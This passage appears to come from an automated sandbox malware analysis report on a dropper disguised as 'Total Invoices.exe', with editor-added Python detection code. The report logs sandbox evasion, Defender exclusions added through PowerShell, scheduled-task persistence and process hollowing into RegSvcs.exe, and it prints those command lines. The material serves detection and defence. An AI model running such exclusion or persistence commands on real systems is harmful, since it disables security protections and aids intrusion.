                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match | File source: Process Memory Space: Total Invoices.exe PID: 7088, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: dWXyZYb.exe PID: 7480, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\Total Invoices.exe | Memory allocated: 15E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exe | Memory allocated: 3180000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exe | Memory allocated: 3080000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exe | Memory allocated: 7F00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exe | Memory allocated: 7910000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exe | Memory allocated: 8F00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exe | Memory allocated: 9F00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exe | Memory allocated: A3D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exe | Memory allocated: B3D0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exe | Memory allocated: C3D0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Memory allocated: 12F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Memory allocated: 2FB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Memory allocated: 2EB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Memory allocated: 7470000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Memory allocated: 8470000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Memory allocated: 85F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Memory allocated: 95F0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Memory allocated: 9CD0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe | Memory allocated: 7470000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: DE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 2BB0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 1170000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 2C30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 2D70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe | Memory allocated: 4D70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\Total Invoices.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6763Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 665Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8538Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 414Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1820Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2347Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1846
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1215
                      Source: C:\Users\user\Desktop\Total Invoices.exe TID: 6508Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep count: 6763 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 665 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe TID: 7528Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 8028Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe TID: 7328Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Total Invoices.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99852Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99619Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99500Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99045Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98930Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98817Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98453Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98344Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98219Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98109Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97891Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99875
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99766
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99656
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99547
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99438
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99313
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99078
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98969
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98844
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98735
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98485
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98213
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeThread delayed: delay time: 922337203685477
                      Source: RegSvcs.exe, 0000000D.00000002.2890152791.0000000005B30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                      Source: RegSvcs.exe, 00000008.00000002.1810859017.0000000006590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\Total Invoices.exeMemory allocated: page read and write | page guardJump to behavior
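The sleep and WMI entries above are the raw material behind the report's "Contains long sleeps", "thread sleep count > 30" and "Queries sensitive ... information (via WMI)" signatures. The script below is an added example written for this page, not Joe Sandbox code: it parses behaviour lines of the textual form shown here (the sample input is constructed from entries visible above), aggregates them per image and re-applies the report's own thresholds (30000 ms, more than 30 sleeps). Two things in it are the editor's assumptions rather than facts the report states: reading 922337203685477 as an effectively infinite delay (the Int64 limit of NtDelayExecution's 100-ns relative timeout divided by 10000), and the list of WMI classes treated as VM fingerprints.

```python
"""Triage of time-based and WMI sandbox-evasion entries from a Joe Sandbox behaviour table.

Added example written for this page (not Joe Sandbox code). Input lines follow the
extracted text form seen above, "Source: <image> [TID: <n>][ -- ]<event>: <details>";
the sample below is constructed from entries visible on this page.
"""
import re
from collections import defaultdict

# NtDelayExecution takes a negative relative timeout in 100-ns units. The most negative
# Int64 divided by 10 000 gives the 922337203685477 "ms" the report shows; a delay of that
# size never elapses, so it is treated here as an infinite sleep. (Editor's interpretation.)
INFINITE_SLEEP_MS = (2 ** 63) // 10_000      # 922337203685477

LONG_SLEEP_MS = 30_000        # the report's own threshold ("-30000s")
MANY_SLEEPS = 30              # the report's own threshold ("> 30")

# WMI classes whose values are compared against known hypervisor strings (editor's list).
VM_FINGERPRINT_CLASSES = {"Win32_BaseBoard", "Win32_Processor", "Win32_ComputerSystem",
                          "Win32_BIOS", "Win32_NetworkAdapter", "Win32_VideoController"}

_LINE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)"              # image path, up to the first ".exe"
    r"(?:\s+TID:\s*(?P<tid>\d+))?"               # optional thread id
    r"(?:\s*--\s*)?"                             # optional column separator
    r"(?P<event>Thread delayed|Thread sleep time|Thread sleep count|Window / User API|WMI Queries)"
    r"(?P<rest>.*)$"
)
_INT = re.compile(r"-?\d+")
_WMI_CLASS = re.compile(r"Win32_\w+")


def parse_line(line):
    """Return (image, kind, value) for a sleep or WMI entry, or None for anything else."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    src, event, rest = m.group("src"), m.group("event"), m.group("rest")
    if event == "WMI Queries":
        cls = _WMI_CLASS.search(rest)
        return (src, "wmi", cls.group(0)) if cls else None
    nums = _INT.findall(rest)
    if not nums:
        return None
    value = abs(int(nums[0]))                    # first number is the delay or the count
    kind = "sleep_count" if event in ("Thread sleep count", "Window / User API") else "sleep_ms"
    return (src, kind, value)


def triage(lines):
    """Aggregate entries per image and flag the evasion patterns the signatures describe."""
    per = defaultdict(lambda: {"max_sleep_ms": 0, "sleep_count": 0, "wmi": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, kind, value = parsed
        if kind == "sleep_ms":
            per[src]["max_sleep_ms"] = max(per[src]["max_sleep_ms"], value)
        elif kind == "sleep_count":
            per[src]["sleep_count"] = max(per[src]["sleep_count"], value)
        else:
            per[src]["wmi"].add(value)
    findings = {}
    for src, rec in per.items():
        flags = []
        if rec["max_sleep_ms"] >= INFINITE_SLEEP_MS:
            flags.append("infinite_sleep")
        elif rec["max_sleep_ms"] >= LONG_SLEEP_MS:
            flags.append("long_sleep")
        if rec["sleep_count"] > MANY_SLEEPS:
            flags.append("sleep_loop")
        if rec["wmi"] & VM_FINGERPRINT_CLASSES:
            flags.append("wmi_vm_fingerprint")
        findings[src] = {**rec, "wmi": sorted(rec["wmi"]), "flags": flags}
    return findings


SAMPLE_LINES = [  # constructed from entries shown in this report section
    r"Source: C:\Users\user\Desktop\Total Invoices.exe TID: 6508Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7296Thread sleep count: 6763 > 30",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2347",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeMemory allocated: 2FB0000 memory reserve | memory write watch",
]

if __name__ == "__main__":
    for image, rec in triage(SAMPLE_LINES).items():
        print(f"{image}: {', '.join(rec['flags']) or 'nothing flagged'}")
```

Lines that are not sleep or WMI entries (memory allocations, process creation) are ignored, so the whole behaviour table can be piped through unchanged. The per-image result keeps the maximum delay and count rather than a sum because the report lists the same thread repeatedly under several signatures.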

                      HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Total Invoices.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"
Source: C:\Users\user\Desktop\Total Invoices.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"
Source: C:\Users\user\Desktop\Total Invoices.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"
Source: C:\Users\user\Desktop\Total Invoices.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"
Source: C:\Users\user\Desktop\Total Invoices.exe -- Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe -- Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Total Invoices.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Total Invoices.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\Total Invoices.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\Desktop\Total Invoices.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
Source: C:\Users\user\Desktop\Total Invoices.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
Source: C:\Users\user\Desktop\Total Invoices.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: FAF008
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 634008
Source: C:\Users\user\Desktop\Total Invoices.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"
Source: C:\Users\user\Desktop\Total Invoices.exe -- Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"
Source: C:\Users\user\Desktop\Total Invoices.exe -- Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"
Source: C:\Users\user\Desktop\Total Invoices.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe -- Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp"
Source: C:\Users\user\AppData\Roaming\dWXyZYb.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
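The entries above form one chain: powershell.exe adds Defender exclusions for the dropper and its copy, schtasks.exe registers an "Updates\dWXyZYb" task from an XML file in %Temp%, and RegSvcs.exe is started with no arguments and then has an MZ-headed image written at base 400000. The following detection logic is an added example written for this page; it is not Joe Sandbox code and not one of the Sigma rules named in the report header. The events are constructed dicts in the shape of Sysmon-style process-creation and cross-process memory-write records, built from the lines above plus one benign control; the field names, the list of .NET host binaries, the user-writable path prefixes and the base64 -EncodedCommand handling (which the report's "Base64 Encoded MpPreference Cmdlet" signature refers to, though this sample passes the cmdlet in clear text) are the editor's own.

```python
"""Detections for the defence-evasion, persistence and injection chain in the process tree above.

Added example (the editor's code, not Joe Sandbox's and not a Sigma rule). Events are
constructed dicts shaped like Sysmon-style process-creation and cross-process memory-write
records; the field names "image", "parent_image", "command_line", "source", "target" and
"first_bytes" are the editor's own.
"""
import base64
import re

# .NET framework binaries commonly started suspended and hollowed to host a payload (editor's list).
HOLLOW_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe",
                "aspnet_compiler.exe", "vbc.exe", "csc.exe"}
USER_WRITABLE = ("c:\\users\\", "\\appdata\\", "\\programdata\\", "\\temp\\")
_ENC = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def _lc(value):
    return (value or "").lower()


def encode_powershell_command(text):
    """Build the base64(UTF-16LE) form that powershell -EncodedCommand expects."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def effective_command_line(command_line):
    """Return the command line plus the decoded -EncodedCommand payload, if one is present."""
    cl = command_line or ""
    m = _ENC.search(cl)
    if not m:
        return cl
    try:
        return cl + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cl  # not a decodable payload; match on the raw text only


def rule_defender_exclusion(ev):
    """powershell.exe adding a Defender exclusion (T1562.001), in clear text or base64."""
    cl = _lc(effective_command_line(ev.get("command_line")))
    return (ev.get("type") == "process_create"
            and _lc(ev.get("image")).endswith("powershell.exe")
            and "add-mppreference" in cl
            and any(k in cl for k in ("-exclusionpath", "-exclusionprocess", "-exclusionextension")))


def rule_task_from_temp(ev):
    """schtasks.exe registering a task whose XML definition lives in a temp directory (T1053.005)."""
    cl = _lc(ev.get("command_line"))
    return (ev.get("type") == "process_create"
            and _lc(ev.get("image")).endswith("schtasks.exe")
            and "/create" in cl and "/xml" in cl
            and any(d in cl for d in ("\\appdata\\local\\temp\\", "\\windows\\temp\\")))


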